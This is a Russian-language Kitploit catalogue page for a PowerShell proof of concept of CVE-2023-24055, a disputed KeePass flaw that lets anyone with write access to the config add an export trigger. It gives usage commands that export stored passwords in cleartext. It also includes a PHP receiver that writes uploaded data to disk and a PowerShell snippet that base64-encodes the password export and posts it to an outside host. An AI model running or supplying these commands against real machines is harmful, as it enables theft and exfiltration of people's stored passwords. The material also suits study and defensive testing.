Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-24055 — CVE-2023-24055 POC, написанный на PowerShell. | Kitploit
Инструменты/GitHubGitHub/yosef0x01/cve-2023-24055
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхОбучение и Образование
GitHubyosef0x01/cve-2023-24055

CVE-2023-24055

CVE-2023-24055 POC, написанный на PowerShell.

Репозиторий
143 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

alt text

Отказ от ответственности

Этот скрипт предназначен только для образовательных и демонстрационных целей. Автор не одобряет и не потворствует использованию этого скрипта в каких-либо преступных или злонамеренных действиях, и его следует использовать только там, где это явно разрешено с соответствующего разрешения.

Этот скрипт следует использовать с осторожностью, так как он изменяет файл конфигурации KeePass и удаляет все ранее настроенные триггеры. Использование этого скрипта может привести к непредвиденному поведению и потенциально нарушить работу приложения KeePass. Используйте на свой страх и риск.

Введение

Этот скрипт демонстрирует ** ОСПАРИВАЕМУЮ ** уязвимость (CVE-2023-24055) KeePass до версии 2.53 включительно (в конфигурации по умолчанию), поскольку она позволяет атакующему с правом записи в XML-файл конфигурации получить пароли в открытом виде путём добавления триггера экспорта. Обратите внимание, что позиция производителя заключается в том, что база данных паролей не предназначена для защиты от атакующего, имеющего такой уровень доступа к локальному ПК.

Ссылки:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
  • https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
  • https://keepass.info/

Инструкции

Чтобы использовать этот скрипт, запустите его в PowerShell и укажите необходимые параметры. Обязательными параметрами являются:

  • -filename: полный путь и имя файла, в который будут экспортированы пароли.

Необязательные параметры:

  • -uploadURL: этот переключатель используется для указания, что данные должны быть загружены на указанный URL.
  • -url: URL-адрес, на который должны быть загружены данные.

Пример использования

Экспорт паролей в открытом виде:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt

Экспорт паролей в открытом виде и загрузка экспорта на веб-сервер:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php

Подробная справка:

root@kitploit:~
get-help .\KlearPass.ps1 -Detailed

Пример PHP-скрипта для загрузки файла на веб-сервер

root@kitploit:~
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>

Пример PowerShell-скрипта для проверки PHP-загрузки

root@kitploit:~
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");

Благодарности

  • Скрипт изначально основан на коде, найденном в https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
  • Идея эксфильтрации экспорта принадлежит https://github.com/alt3kx/CVE-2023-24055_PoC.
Скачать инструмент